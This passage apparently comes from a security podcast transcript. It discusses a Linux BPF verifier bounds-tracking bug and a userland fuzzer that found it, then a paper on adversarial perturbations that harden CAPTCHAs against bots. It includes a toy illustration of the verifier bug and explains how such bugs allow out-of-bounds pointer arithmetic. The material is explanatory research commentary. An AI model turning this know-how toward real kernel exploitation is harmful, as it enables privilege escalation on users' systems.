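tracked = tracked_u32_max_buggy(0, src_umax64)
print(hex(tracked))  # 0x0 -- the verifier now "knows" the 32-bit result is 0

# But a runtime source value like 0xFFFF is within the 64-bit bound, so the
# real 32-bit OR result blows right past the tracked bound:
actual = 0 | 0xFFFF
print(hex(actual))   # 0xffff, far above the tracked bound of 0
```

Once the verifier's believed range is tighter than reality, it will happily prove pointer arithmetic "in bounds" that an attacker can push out of bounds at runtime, which is the whole game with these verifier bugs.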
Yeah, I do have a few questions, or points of contention, with the blog post, though. For one thing, when they were citing the background of why they chose to write their own fuzzer instead of using existing ones, they said that the BPF verifier is protected by a mutex and thus not scalable. I mean, you can still scale; you would just run multiple VMs that are hitting the verifier in parallel, and isolate each core to a VM, which is exactly what he did. You can do that with syzkaller. So I'm not really sure that's a valid point for why not to use syzkaller.
Well, but with syzkaller you're generally going to want to run multiple programs at the same time too, which you wouldn't be able to do with the mutex held. Yeah, you would want to do that, but you
can configure it not to, which would essentially be doing the same thing he did. So yeah, I'm trying to think of why they wouldn't just configure syzkaller.
Yeah, one question from a friend: does syzkaller fuzz this part of the kernel? I don't think there are any descriptions right now that'll hit BPF, but you should be able to. If you wanted to add it, it wouldn't be just straight-up descriptions to fuzz this; you'd probably have to wrap
it. Yeah, you'd probably need the pseudo-syscalls
to actually do it, but you could get some coverage in there. I'm not sure if syzkaller would really be the right option for fuzzing BPF.
kAFL probably would have been a better option. Yeah,
yeah. I mean, syzkaller is obviously really focused around the syscalls. So the other thing that I
wanted to touch on was the custom bug detection solution. Like I said, I thought it was a neat and clever solution. I'm also not entirely sure all that effort was necessary, though, because with the Linux kernel you have the source code, and he's compiling it and running it in userland. They should have been able to compile this with ASan instrumentation, which should have been able to catch the issues they were trying to detect. I'm not sure why they didn't just compile it with ASan. Maybe there were some challenges there, maybe they tried that and just didn't list it in the blog post, which, if that's the case, fair enough. But that's just something that ran through my mind while I was reading it: why not just use the instrumentation that already exists, right? That instrumentation is provided by the compiler for you; it doesn't really require a lot of extra effort to use. It does seem clear that they didn't leverage that. I'm not sure
how ASan would work if you're doing the usual hooking on like an ELF and stuff. I'm not sure if the difference in how the allocators work would also cause problems with ASan. That would be a possibility. They don't discuss it at all, so we're only left to
speculate. Yeah. I wish they went into the insights on that, because I feel like it would have been an obvious path to take, so there were probably challenges they hit that they just didn't lay out.
But also, performance would be another case: they do have a fairly simple bug detection here, like a very quick check. They don't need to instrument everything and go through all of that. So I can kind of see that being another reason; they're getting more iterations out, in
effect. Yeah. The final point of contention I had was, I'm not super sold on the "fuzzing kernel code is too slow" angle. They mentioned the syscalls and context switches and stuff like that, and how that would slow down fuzzing. For sure, context switches do have a cost, but is the performance benefit really worth all that effort of implementing it in userland, having to hook all those kernel API functions, and then also potentially losing instrumentation like ASan, like we just talked about?
In support of the author, though: you do the hooking once, and then you should be able to reuse those hooks on other code being pulled out of the kernel. So this kind of comes down to the value of what we've talked about before, micro-fuzzing, you know, when you pull out specific functions to fuzz. I'm going to say, assuming you've written a central library to hook those kernel functions and you're able to easily do this, it actually speeds things up quite a bit to not need to hit the kernel at all. You're definitely getting more iterations, and you can definitely debate whether or not more iterations is actually the right metric to focus on, but you can't deny that more iterations means more tests, and in theory the ability to get more coverage quicker. I'd have to say that it probably is worth it to pull some things out of the kernel and fuzz them in userland if you're able to get significant speedups, but you do kind of need these systems that are fairly isolated, that just kind of stand on their own.
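The "hook the kernel API and run the code in userland" idea can be sketched in miniature. Real harnesses do this at compile or link time in C (e.g. redefining kmalloc to plain malloc when building the extracted code); the function-table indirection below is purely to make the substitution visible, and all the names are hypothetical.

```python
# Toy sketch of a userland harness for extracted kernel code: the code
# calls kernel APIs through a table, and the harness swaps those entries
# for plain userland equivalents before fuzzing/exercising it.
kernel_api = {}

def extracted_driver_code(n):
    # imagine this body was lifted out of the kernel unchanged;
    # it allocates a buffer via "kmalloc" and fills it
    buf = kernel_api["kmalloc"](n)
    for i in range(n):
        buf[i] = i & 0xFF
    return buf

# Harness setup: substitute the kernel allocator with a userland stand-in.
kernel_api["kmalloc"] = lambda n: bytearray(n)

out = extracted_driver_code(4)
print(list(out))  # [0, 1, 2, 3]
```

The appeal is exactly what's argued above: write the shim layer once, and any reasonably self-contained chunk of kernel code can be iterated on at userland speed. The cost, as Specter notes next, is the manual effort when the target calls hundreds of kernel functions.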
Yeah, I mean, I was going to say, that is the problem with this type of approach: it's not really scalable. If you're looking to target a driver that uses a lot of kernel API functions, like, think about it, with some of these drivers you could potentially have to hook hundreds of functions, and at that point it just doesn't seem like it's worth the benefit.
unless you make a library that just hooks the entire kernel, effectively. I mean, that would take quite a bit of time and
everything, feels like a lot of work,
but you do that once and it works for everything
now. Pulling in a chat question: why wouldn't it be scalable? Why I'm saying it wouldn't be scalable is that the amount of manual overhead involved in hooking all those functions increases a lot when you're looking at different
subsystems. Yeah, and you're talking about kind of the human scalability aspect of it; it's not that it wouldn't be scalable in terms of execution time, like executing across multiple
cores. Yeah, exactly, the human aspect. Now, what I would have wished this post included: since they cited this performance angle and why they wanted to fuzz in userland, I wish there were stats to back that up, because I feel like there could be a perceived bias there, right? Like, if you're running it in userland and you're like, oh, this seems to be faster. Especially when you're talking about the kernel, there are so many things that could be impacting performance; there's a lot of variance that could be introduced. Like, it could run even faster, or there could have just been something else running at the same time as your thing when you measured it. So that's why I wish there were more stats we could look at, to get some insights there. But obviously they didn't feel the need to include that, so that's fair, I
guess. I think one thing is just the fact that userland programs get significantly more iterations than, like, syzkaller gets with syscalls. I think that would be kind of the author's case. Now, technically you can definitely argue that that's a bit of an apples-to-oranges comparison; they're just not the same thing. In this case you're still pulling out kernel code, but there is at least what seems to be an intuitive understanding that userland programs are faster.
I will wrap up this blog post by saying I did really like it. I think there's a lot of useful insight here, especially on the fuzzing side of things.
Yeah. I enjoyed the read, with his process for the fuzzer. I thought that was
interesting. And it's another example of a bug that was fixed, but wasn't fixed properly. You know, another one of those adages: just because they tried to fix something, or issued a patch, doesn't mean it was patched correctly, and this fuzzer and this blog post demonstrate that. And it's another point in the column of "BPF is just really damn hard to properly verify and secure." There are so many edge cases that it's hard to keep them all in your mind when you're writing the code for BPF and the types of operations it supports, which is just another example of why I'm not really sure why it's exposed to unprivileged users, or why it's even in the kernel at all, but that's a different debate, maybe for a different time. With that said, I think we can move into our research, which is our last topic of the episode: Capture the Bots. So this is using adversarial examples to improve CAPTCHA robustness to bot attacks. This is a little bit different today for a research section; it's not something that's fuzzing or vulnerability research or exploit dev related. This one is about improving CAPTCHAs to be easy for humans to solve but robust against bots. This year especially, we're seeing the need arise for such advancements; the automated scalping that's happened with major PC part launches this year, Nvidia and such, has been kind of off the charts, and one thing this paper points out is that it's only going to get worse if things stay as they are. So deep learning is advancing; they note it's even surpassed humans when it comes to some tasks, like image and speech recognition, which are the most common things used for CAPTCHAs, right, the ability to parse an image and, you know, output the characters or whatever it's displaying. So their paper introduces a new technique called CAPTURE, which stands for CAPTCHA Technique Uniquely Resistant.
I'm not sure why they needed the extra letters in there; it seems like they just needed some filler to be able to spell out a real word. But whatever. The basis of it seems to be the idea of using adversarial perturbations to throw off machine learning: adding frequency-domain perturbations to the CAPTCHA that are mostly invisible to humans, or that humans aren't really going to care about, but that are going to mess with the bots' classifiers. How they generate these adversarial images is by combining two techniques. The first is evolutionary algorithms, which are basically a technical implementation of natural selection, and they use that to generate samples that fool deep neural networks into thinking they recognize an image with 99% certainty, that they can make sense of it, when really the image is basically just garbage, and they take that image and encode it into the image they show for the CAPTCHA. The second technique they use is adversarial patches, which is a common technique for fooling classifiers. Especially early on in the year, when we covered a lot of deep learning based papers, adversarial patches were probably the most common technique that we saw and covered on the podcast. The idea of adversarial patches is you just overlay a patch on the image, and the classifier uses the information from that patch where it should be discarding it; it treats it as more important than it actually is, and that can throw off the classifier. So they combine these two techniques to arrive at their main product, which is the CAPTURE idea. So on page 11, I think it's figure 3, I'm just going to scroll down to it, you can kind of see the results of their research. You can see the images; they have those patches, the little circles overlaying them. When a human sees that, they're just going to disregard it.
They're not going to pay any attention to it, and you can see there are some distortions in some of the images as well. When they looked at the evaluation: they did a survey of a hundred and thirteen people with these types of CAPTCHAs and asked them to solve 10 CAPTCHA challenges, and overall, humans solved them with an 85 percent success rate, and it had a 92 percent success rate against bots. And they stated that the humans, the people who took the survey... so now, this is
actually, er, that's 92%, like, bots failed 92% of the time. Yeah, just a 92 percent success rate
exceeds 90% of the
yeah, sounds like it's doing better against the bots than the humans were doing.
Yeah. But one thing that was interesting that I wanted to call out is the human participants in the survey said they liked this CAPTCHA more than some of the existing ones, because some of the images were just so different from what the CAPTCHA was asking for that they could immediately disregard them, so they were able to solve them a little bit faster. So that was an interesting point to call out. Another thing I found interesting in their evaluation section: the unrecognizable-images encoding on its own seemed to have a higher success rate against the bots than both techniques combined. This was in their usability evaluation; I'll bring it up here now so you can see the success rates. Unrecognizable images, they had 96.5, adversarial patch, they had 86, and combined it's 92. So just using the encoding with the unrecognizable images would have been better against bots. I'm assuming the reason they combined it with the adversarial patch was, I guess, maybe so they could tone down the unrecognizable images to make it easier for humans to solve. They didn't really seem to talk about this aspect for some reason; I really wish they did, because that discrepancy seemed like something that would have been worth addressing, in my opinion. But yeah, that was just a weird quirk I noticed in their evaluation section. Overall, though, I think it's a cool technique. It's taking some of the stuff we've covered on the podcast before, some of the research we've seen in academia, and putting it to good use that we could really use going forward, because the bot situation with scalping is not going to get any better, as we've seen.
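As a minimal stand-in for the adversarial-example idea discussed here (this is not the paper's evolutionary-algorithm or patch method, just a toy FGSM-style example against a linear "classifier", with made-up numbers): a small, bounded nudge to each input in the direction that hurts the model flips its answer while barely changing the input, which is the same property CAPTURE leans on against real networks.

```python
# Toy demonstration: a tiny per-pixel perturbation flips a linear
# "classifier" while staying visually negligible. All values invented.
w = [0.5, -1.0, 0.25, 0.75]          # toy model weights
x = [0.2, 0.1, 0.3, 0.05]            # "clean" image pixels

def score(weights, pixels):
    return sum(wi * pi for wi, pi in zip(weights, pixels))

eps = 0.2                             # max per-pixel change (kept small)
sign = lambda v: 1 if v > 0 else -1

# Nudge each pixel against the direction the model relies on.
x_adv = [pi - eps * sign(wi) for wi, pi in zip(w, x)]

print(score(w, x) > 0)       # True  -- clean input classified one way
print(score(w, x_adv) > 0)   # False -- the tiny perturbation flips it
print(max(abs(a - b) for a, b in zip(x, x_adv)))  # ~0.2, bounded change
```

Real attacks (and defenses like this paper's) do the same thing with gradients of deep networks and image-sized inputs, but the core asymmetry, imperceptible to a human, decisive to the model, is already visible in four numbers.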
Yeah. I'd seen this paper, I think you were just about to mention it, pretty much because of my history. Oh yeah, I kind of got my start with a lot of programming actually doing CAPTCHA breaking. Now, this was back like 2003-2004, when CAPTCHAs were a lot simpler; it was more of an OCR problem, just recognizing characters. But I also spent a lot of time, with my first kind of development job, part of what I did was trying to catch bots, and some of that was creating traps for bots. So I kind of like this, because it harkens back to
that sort of anti-cheat style. So I was working on a game at the time and doing some anti-cheat development, but a lot of what I did was trying to find these little quirks in how the bots would work, in order to tell humans and bots apart. So, I don't know, I like this paper just because it harkens back to that approach: rather than just making things harder and harder to read, finding other things that just trip the bots up, because it's either unexpected or they're not trying to game it, things like that. So I just want to give a shout-out to that area; I don't think it gets enough research, and that's where you start getting CAPTCHAs that are easier for humans to solve but harder for bots to deal with.
This is one of the very few practical applications I've seen of the adversarial deep neural network attacks that we've covered, because we used to cover a lot of these types of adversarial, poisoning-based attacks, and while they were cool, they were kind of contrived, and they didn't really seem like they could practically be applied anywhere. Like, they were fooling classifiers for security cameras and stuff like that, but it was very obvious; somebody would have to wear like an LED strip or something, very obvious to somebody who would actually be in the room, for example. They never really seemed like practical applications.
The real impractical one to me, the one I'm reminded of, is there was one where you had kind of like person tracking as people would walk by, and you would have to set up a TV to play a particular image, so that when you walked by it, the tracking would think that you were still on the TV or whatever; it would end up tracking that image as you walked away. It's like, yep, you've just got to carry in a TV, nobody's going to notice this, position it just right against the camera, and all that. Yeah, I don't know, when you talk about the impracticality of some of them, that's the one that comes to mind.